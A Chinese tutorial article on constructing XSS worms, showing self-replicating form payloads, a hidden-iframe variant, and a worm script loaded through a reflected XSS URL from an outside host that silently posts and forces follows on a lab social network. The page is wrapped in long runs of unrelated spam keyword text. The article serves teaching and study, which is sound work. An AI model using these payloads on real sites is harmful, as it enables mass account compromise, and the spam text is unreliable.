精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

XSS蠕蟲的構造

安全 應用安全
XSS攻擊最大的危害在于可能在一個系統中的用戶間互相感染,以致整個系統的用戶淪陷。能夠造成這種危害的腳本我們稱之為XSS蠕蟲。

小編寄語:

XSS攻擊最大的危害在于可能在一個系統中的用戶間互相感染,以致整個系統的用戶淪陷。能夠造成這種危害的腳本我們稱之為XSS蠕蟲。

[[170941]]

第一部分

XSS攻擊最大的危害在于可能在一個系統中的用戶間互相感染,以致整個系統的用戶淪陷。能夠造成這種危害的腳本我們稱之為xss蠕蟲。

為了更好的理解為xss蠕蟲的工作原理,我們需要開始一段嶄新的旅程去了解構造自我復制的代碼所需要的技術。

出于教學目的,我們將僅僅以最簡單的代碼實例做講解。 所以我們盡可能避免使用XHR等js過程。

讓我們來看看最簡單的一個自我復制的反射型XSS實例。它僅僅能夠在頁面注入一個鏈接,打開這個鏈接將在新的標簽頁中注入同樣的xss語句。 

  1. <a href target=_blank>click</a> 

可以在這里(http://brutelogic.com.br/webgun/test.php?p=%3Ca%20href%20target=_blank%3Eclick%3C/a%3E)嘗試一下。

現在我們來看一個稍微復雜一些的例子。這個(http://brutelogic.com.br/tests/comments.php)頁面用于發送評論,并且存在存儲型xss。 如果我們在評論中插入如下代碼: 

  1. <form method=post onclick=elements[0].value=outerHTML;submit()> 
  2. <input type=hidden name=comment>click me!</form> 

這里注入了一個表格,使用post方法發送comment參數。每當onclick方法被觸發時,它會將表格中的第一個元素的value填充為整個form標簽內的html代碼(包括form標簽本身)這樣每當有人點擊click me!我們就能不斷的發送這條評論到評論頁面中,也就完成了自我復制。

對于很少有用戶交互的xss向量,我們可以使用onmouseover事件或者類似的css trick來增加觸發蠕蟲的可能性。

盡管上面這個例子看起來很有趣,但是實際上一般評論頁面都不會允許在評論中插入一個表格,在反射型xss中更有可能觸發,但是這樣造成的危害并不大,所以為了造成實際危害,我們需要結合反射型XSS與存儲型XSS。

下面的一段代碼將被插入到一個反射型xss中。

  1. <form method=post action="//brutelogic.com.br/tests/comments.php" 
  2. onclick="elements[0].value='<a/href='%2BURL%2B'>link</a>';submit()"> 
  3. <input type=hidden name=comment>click me!</form> 

當click me被點擊時,它將向comments.php post數據,完成發送評論的操作。和之前的html代碼不同的是,他post的comment內容不再是一個表格,而是一個鏈接,鏈接的內容指向同樣的xss向量,也就是注入了蠕蟲代碼的的存在存儲型xss的頁面。鏈接被點擊后將繼續造成蠕蟲傳播。

為了讓攻擊進行的更加隱蔽,我們可以不讓用戶返回至comment頁面,而是通過插入一個不可見的iframe,并將請求在這個不可見的iframe中打開,代碼如下: 

  1. <iframe style=display:none name=x></iframe> 
  2. <form method=post action="//brutelogic.com.br/tests/comments.php" 
  3. onclick="elements[0].value='<a/href='%2BURL%2B'>link</a>';submit()" 
  4. target=x><input type=hidden name=comment>click me!</form> 

在這里嘗試(http://brutelogic.com.br/webgun/test.php?p=%3Ciframe%20style=display:none%20name=x%3E%3C/iframe%3E%3Cform%20method=post%20action=%22//brutelogic.com.br/tests/comments.php%22onclick=%22elements%5B0%5D.value=%27%3Ca/href=%27%2bURL%2b%27%3Elink%3C/a%3E%27;submit%28%29%22target=x%3E%3Cinput%20type=hidden%20name=comment%3Eclick%20me!%3C/form%3E)。

下一部分中,我們將做一個獨特的實驗,即xss在傳統社交網絡中的不同用戶間的傳播是如何進行的。

第二部分

為了理解XSS蠕蟲的實際應用,我們首先介紹一下XSS蠕蟲的傳播環境,一個簡單的社交網絡。我們姑且叫他XSSbook,它的數據庫主要由三個表組成。 

每個表的內容 

users表有該社交系統中的用戶信息,包括用戶id,登錄名,姓名,加密后的密碼,電子郵箱地址和簡單的自我介紹。

posts表存儲了文章信息,包括文章id,發布者id,文章內容與文章發布時間。

最后,follows表描述了用戶之間收聽與被收聽的關系,即每個收聽的用戶的動態都會出現在該用戶的timeline上。

這一系列php代碼可以完成會話控制等功能,支撐整個系統的運轉。 

現在挑戰在于用如何盡可能接近真實社交網絡的數據傳播來使用虛假數據產生一個數據庫。為了達到這個目的,我們會使用bash腳本來生成一系列數據以貼近大型社交網絡。我們也將努力的呈現這種呈指數級別增長的XSS蠕蟲的威力,即當成千上萬的用戶連接時,XSS蠕蟲的傳播將越來越快! 

第三部分

我們以一個數據集合開始產生一個XSSBOOK的數據庫。 

和傳統社交網絡一樣,只有極少用戶能夠擁有大量的聽眾。為了方便演示,這里我們產生了一百個用戶,他們都有同樣的密碼12345678。

其中,“Brute”是最后一個用戶。 

XSSBOOK這個應用看起來是這個樣子的。 

首頁顯示了收聽的用戶所發表的信息。在上面的截圖當中,Brute收聽了Angela并且看到Angela最近的推文。他的資料頁展示了他的聽眾數量(目前是0)和自我介紹。Brute還沒有發表過推文所以沒有顯示。

蠕蟲傳播的開始,第一個受到感染的是George。他因為訪問了一個通過搜索功能存在的反射型xss漏洞構造的蠕蟲而受到感染:

http://localhost/xssbook/search.php?user=%3Cscript%20src=//brutelogic.com.br/tmp/xssbook.js%3E%3C/script%3E

引入的js的內容為

x = new XMLHttpRequest();

x.open('POST', 'home.php', true);

x.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

x.send('post=

Check this!');

fr = document.createElement('iframe');

fr.setAttribute('name', 'myFrame');

fr.setAttribute('style', 'display:none');

document.body.appendChild(fr);fo = document.createElement('form');

fo.setAttribute('method', 'post');

fo.setAttribute('action', 'profile.php?id=100');

fo.setAttribute('target', 'myFrame');

i = document.createElement('input');

i.setAttribute('type', 'hidden');

i.setAttribute('name', 'follow');

fo.appendChild(i);

fo.elements[0].value='follow';document.body.appendChild(fo);

fo.submit();

解析一下這段js

x = new XMLHttpRequest();

x.open('POST', 'home.php', true);

x.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

x.send('post=

Check this!');

開頭四行是蠕蟲的自我傳播部分,它在用戶不知情的情況下發送了一條推文,推文的內容首先閉合了 textarea標簽,插入了一個換行符,再插入了一個指向當前頁面(即蠕蟲傳播)的鏈接。

fr = document.createElement(‘iframe’);

fr.setAttribute(‘name’, ‘myFrame’);

fr.setAttribute(‘style’, ‘display:none’);

document.body.appendChild(fr);

這四行我們創建了個看不見的iframe,這個iframe將會成為接下來蠕蟲要創建的form的target(這樣做的目的見上文)。

fo = document.createElement('form');

fo.setAttribute('method', 'post');

fo.setAttribute('action', 'profile.php?id=100');

fo.setAttribute('target', 'myFrame');

這四行代碼創建了一個form,target是之前的iframe,目標頁面是100號用戶的個人資料,也就是brute用戶的個人資料頁面。

i = document.createElement(‘input’);

i.setAttribute(‘type’, ‘hidden’);

i.setAttribute(‘name’, ‘follow’);

fo.appendChild(i);

這里創建了個不可見的input塊,目的在于post一個follow的值。

fo.elements[0].value='follow';

而follow的值也被設定為follow。

document.body.appendChild(fo);

form被加入到頁面中

fo.submit();

form最終被提交。

如我們所見,這段蠕蟲代碼將會復制自身,傳播自身,并且關注用戶“Brute”

所以我們現在有一個100人規模的社交網絡,連接數為463。我們現在要看看蠕蟲在用戶間的傳播。為了達到這個目的我們將使用Firefox擴展Selenium IDE。 

我們使用該擴展模擬用戶的行為,通過給定的csv表格中的帳號信息陸續登錄賬戶,點擊timeline上的鏈接。接下來我們就可看到該蠕蟲的快速傳播。

責任編輯:未麗燕 來源: 安全智庫sec
相關推薦

2013-05-22 11:00:59

2013-12-09 14:36:20

2019-01-08 11:58:23

網絡安全網絡安全技術周刊

2014-06-12 13:44:19

2016-09-29 14:03:06

2013-04-07 10:11:27

2014-06-20 11:13:11

2011-06-29 09:57:45

2009-07-07 11:04:12

百變蠕蟲病毒卡巴斯基

2014-05-14 13:13:59

2017-02-15 08:20:13

2010-12-17 10:07:55

2009-07-07 22:52:21

2017-05-19 12:59:21

2010-09-13 14:27:36

2010-07-20 10:26:50

2017-09-19 15:45:39

2014-08-13 18:47:46

2009-07-21 12:35:00

Scala從構造器

2011-03-25 13:38:58

點贊
收藏

51CTO技術棧公眾號

成年人看的免费视频| 中文字幕中文字幕在线中一区高清 | 美女任你摸久久| 久久亚洲精品中文字幕冲田杏梨| 性猛交╳xxx乱大交| 国产精品高清乱码在线观看| 亚洲欧洲制服丝袜| 欧美午夜精品理论片a级大开眼界| 亚洲一区二区人妻| 宅男噜噜噜66国产日韩在线观看| 日韩在线视频导航| 中文字幕一区二区三区人妻不卡| 成人在线视频国产| 欧美午夜宅男影院在线观看| 欧美xxxx吸乳| a天堂在线资源| 成人app下载| 成人女保姆的销魂服务| 亚洲国产成人无码av在线| 欧美成人嫩草网站| 最新国产精品亚洲| 久久精品无码一区| 欧美午夜寂寞| 精品国产一区久久| 91热视频在线观看| 欧美日韩国产网站| 欧美色另类天堂2015| 99国产精品白浆在线观看免费| 国产精品秘入口| 99久久99精品久久久久久| 成人免费视频网站入口| 成人1区2区3区| 国产综合一区二区| 国产精品自拍视频| 亚洲午夜无码久久久久| 午夜在线观看免费一区| 久久久视频精品| 激情五月婷婷在线| 午夜精品999| 久久国产精品影视| 污软件在线观看| 91精品国产91久久综合| 久久精品免费播放| 99成人在线观看| 99热精品久久| 久久国产加勒比精品无码| 国产小视频你懂的| 欧美韩日高清| 久久精品精品电影网| 99鲁鲁精品一区二区三区| 日韩欧美电影| 久久精品免费播放| 欧美黄色免费观看| 亚洲高清久久| 91国内在线视频| 波多野结衣国产| 美女精品网站| 国产精品美乳一区二区免费| 中文字幕视频一区二区| 精品在线免费视频| 亚洲精品欧美日韩专区| 丰满人妻一区二区三区免费视频| 成人激情文学综合网| 精品一区二区三区日本| 全色精品综合影院| 中文字幕乱码亚洲精品一区| 伊人久久大香线蕉成人综合网 | 思热99re视热频这里只精品| 国产丝袜一区二区| 国产传媒在线看| 91成人网在线观看| 午夜精品国产精品大乳美女| 手机在线看片1024| 九九视频精品免费| 国产精品青青草| 久久这里精品| 亚洲视频免费看| 3d动漫一区二区三区| www成人在线视频| 7777精品伊人久久久大香线蕉| 曰本三级日本三级日本三级| 台湾色综合娱乐中文网| 中文字幕欧美亚洲| 久久国产在线观看| 日本麻豆一区二区三区视频| 亚洲wwwav| 天堂在线视频网站| 国产农村妇女毛片精品久久麻豆| 91制片厂免费观看| 在线日韩影院| 欧美一区二区三区公司| 欧美亚一区二区三区| 五月婷婷六月综合| 26uuu另类亚洲欧美日本一 | 亚洲护士老师的毛茸茸最新章节| 熟女少妇内射日韩亚洲| 国模一区二区三区| 国产精品亚洲片夜色在线| 亚洲国产日韩在线观看| 日本一区二区久久| 国产av天堂无码一区二区三区| 成人午夜毛片| 亚洲国产小视频| 日本一级二级视频| 丝袜亚洲另类丝袜在线| 国产高清一区视频| 欧洲美女少妇精品| 欧美午夜激情小视频| 亚洲欧美激情精品一区二区| a级黄色小视频| 日韩毛片在线| 日韩精品视频免费在线观看| 欧美精品xxxxx| 麻豆精品一区二区av白丝在线| 国产欧美一区二区三区不卡高清| 免费高清完整在线观看| 日韩欧美主播在线| 国产女主播在线播放| 久久婷婷蜜乳一本欲蜜臀| 88国产精品欧美一区二区三区| 国产原创中文av| 久久精品无码一区二区三区| 嫩草影院中文字幕| 国产精品亚洲欧美一级在线 | 亚洲av网址在线| 欧美日韩国产成人精品| 国产精品一区专区欧美日韩| 日本韩国一区| 天天综合色天天| 亚洲一区二区三区四区av| 国产精品成人一区二区不卡| 国产精品jizz在线观看麻豆| 头脑特工队2在线播放| 亚洲一区二区三区免费视频| 国产在线观看中文字幕| 天天做天天爱天天爽综合网| 国产v综合v亚洲欧美久久| 天天综合永久入口| 天涯成人国产亚洲精品一区av| 午夜性福利视频| 欧美韩国一区| 成人免费视频观看视频| av片在线观看永久免费| 欧美一级黄色录像| 国内偷拍精品视频| 国产v综合v亚洲欧| 欧美一级欧美一级| 台湾佬综合网| 国产999在线| 成人不用播放器| 欧美日韩视频第一区| 久久精品日韩无码| 国产麻豆9l精品三级站| 9191国产视频| 国产精品极品| 91精品国产91久久久| 清纯唯美亚洲色图| 欧美天堂一区二区三区| 欧美一级特黄高清视频| 国产一区二区伦理片| 野外做受又硬又粗又大视频√| 国产精品115| 琪琪第一精品导航| 成人精品福利| 欧美一区二区久久久| 久久免费小视频| 93久久精品日日躁夜夜躁欧美| 青青青免费在线| 精品视频网站| 国产精品久久久久久久久男 | 国产伦精品一区二区三区妓女下载| 欧美精品日韩| 久久av一区二区三区亚洲| 色8久久影院午夜场| 久久视频免费在线播放| 成人小说亚洲一区二区三区| 欧美色道久久88综合亚洲精品| 香蕉久久久久久久| 丁香桃色午夜亚洲一区二区三区| 日本少妇高潮喷水视频| 久久高清免费| 国外成人免费视频| 国产极品嫩模在线观看91精品| 免费av在线一区| 欧美人体大胆444www| 欧美精品在线视频| 天堂网一区二区三区| 国产精品久久一卡二卡| 超碰caoprom| 麻豆久久一区二区| 丰满少妇大力进入| 91影院成人| 国外成人在线视频网站| 粉嫩一区二区三区| 久久99精品久久久久久噜噜| 久草在线网址| 欧美成人一区二区| 国产免费www| 午夜精品久久久久久久久久| 青青青视频在线播放| 99久久久久久| 欧美体内she精高潮| 老色鬼久久亚洲一区二区| www.国产亚洲| 日本精品黄色| 欧美激情视频一区二区三区| 久久国产精品美女| 国产精品一区二区久久久| 成人bbav| 欧美激情中文网| 91香蕉在线观看| 日韩三级影视基地| 69av在线| 亚洲人午夜精品| 天堂av一区二区三区| 日韩美女视频在线| 国产又黄又大又粗的视频| 色综合久久综合网97色综合 | 婷婷色在线资源| 久久精品视频导航| 在线观看a视频| 一区二区福利视频| 男人天堂资源在线| 精品视频在线观看日韩| 手机av在线免费观看| 日韩精品最新网址| 国产片在线播放| 欧美人xxxx| 一区二区三区黄| 欧美久久久一区| 免费黄色av片| 在线观看国产91| 久久精品偷拍视频| 欧美三级电影网| 中文字幕777| 欧美色网站导航| 在线免费观看高清视频| 在线观看亚洲a| 在线观看黄色网| 欧美日韩不卡一区二区| 亚洲影院一区二区三区| 欧美日韩aaa| 国产亲伦免费视频播放| 91精品国产色综合久久不卡蜜臀| 国产精品免费无遮挡| 911国产精品| 精品国产99久久久久久宅男i| 91精品国产91久久久久久最新毛片 | 亚洲第一视频在线| 欧美亚洲国产bt| 中文文字幕一区二区三三| 欧美调教femdomvk| 国产精品女人久久久| 日韩一区二区在线看| www精品国产| 亚洲成av人片在线观看香蕉| 天堂网av在线播放| 亚洲图中文字幕| 日本在线免费看| 欧美第一页在线| 激情黄产视频在线免费观看| 国产91亚洲精品| 男女啪啪999亚洲精品| 亚洲一区二区三区乱码aⅴ蜜桃女| 亚洲一区二区免费在线观看| 精品免费日产一区一区三区免费| 国产欧美一区二区精品久久久| 亚洲国产精品一区在线观看不卡| 91精品亚洲| 欧美日韩福利在线| 青青草原综合久久大伊人精品优势| 在线观看岛国av| www.性欧美| 国产在线免费av| 亚洲曰韩产成在线| 国产女主播喷水视频在线观看| 7777精品伊人久久久大香线蕉完整版| 精品久久久无码中文字幕| 亚洲精品第一页| 午夜视频在线看| 97精品欧美一区二区三区| 成人涩涩视频| 国产精品美女xx| 日韩激情在线| 九九爱精品视频| 久久精品国产精品亚洲红杏| 最新版天堂资源在线| 国产三级久久久| 国产无码精品久久久| 欧美日韩精品一区二区三区| 性一交一乱一精一晶| 国产亚洲精品久久久久久牛牛| 在线视频国产区| 国产精品久久久久久久久免费看| 成人线上播放| 一本一本a久久| 久久av一区| 日韩高清一二三区| 国产精品欧美久久久久无广告| 在线观看 中文字幕| 91麻豆精品国产综合久久久久久| 欧美日韩国产综合视频| 欧美极品少妇xxxxⅹ裸体艺术 | 精品丰满少妇一区二区三区| 黄色精品在线看| 99久久久久成人国产免费| 亚洲天堂男人天堂女人天堂| 高清电影在线免费观看| 91免费看国产| 成人在线电影在线观看视频| www.好吊操| 国产剧情一区在线| 熟女少妇内射日韩亚洲| 狠狠躁夜夜躁人人躁婷婷91| 国产高清视频免费观看| 日韩在线观看高清| 欧美男女交配| 久久久久久久久一区| 亚洲小说欧美另类社区| 图片区乱熟图片区亚洲| 亚洲欧美在线aaa| 精品久久久久久久久久久国产字幕| 亚洲成人久久电影| 成人超碰在线| 成人免费在线看片| 欧美精品成人| 亚洲丝袜在线观看| 亚洲免费观看高清完整版在线观看熊| 伊人成年综合网| 亚洲人a成www在线影院| 欧美激情网站| 欧美国产综合视频| 午夜在线精品| 日本高清www| 色哟哟日韩精品| 国产一级网站视频在线| 国产suv精品一区二区三区88区| 日韩最新在线| 国产在线精品91| 97aⅴ精品视频一二三区| 国产精品100| 亚洲欧洲视频在线| 日韩不卡免费高清视频| 欧美一区三区二区在线观看| 日韩精品三区四区| 天天舔天天操天天干| 欧美三级三级三级| 无遮挡动作视频在线观看免费入口| 国产精品高潮呻吟久久av黑人| 成人羞羞视频播放网站| 少妇一级淫免费放| 国产精品高潮呻吟| 99视频免费看| 久久男人的天堂| 欧美成人专区| 999香蕉视频| 国产精品美女一区二区| 国产精品毛片一区二区在线看舒淇| 免费不卡在线观看av| 精品三级av| 国产成人无码一二三区视频| 国产日韩欧美电影| 国产又爽又黄又嫩又猛又粗| 欧美大奶子在线| 欧美1区二区| 在线免费观看视频黄| 亚洲三级小视频| 丁香六月天婷婷| 欧美最猛性xxxx| 天天射天天综合网| 日韩大尺度视频| 日韩欧美国产成人| 在线视频自拍| 国产乱人伦精品一区二区| 日韩中文字幕一区二区三区| 日本一级特级毛片视频| 亚洲第一福利网| 电影亚洲一区| 免费极品av一视觉盛宴| 久久综合久久综合亚洲| 亚洲一级片免费看| 久久久亚洲欧洲日产国码aⅴ| 激情婷婷综合| 樱花草www在线| 欧美日韩色婷婷| 国产原创精品视频| 免费不卡亚洲欧美| 国产一区不卡视频| 手机看片久久久| 精品视频9999| 嫩草影视亚洲| 中文字幕人妻无码系列第三区| 欧美性极品xxxx做受| 黄色动漫在线观看| 欧美理论一区二区| 国产电影精品久久禁18| 国产精品传媒在线观看| 久久久久久久999| 国产高清一区| 国产一二三四五区|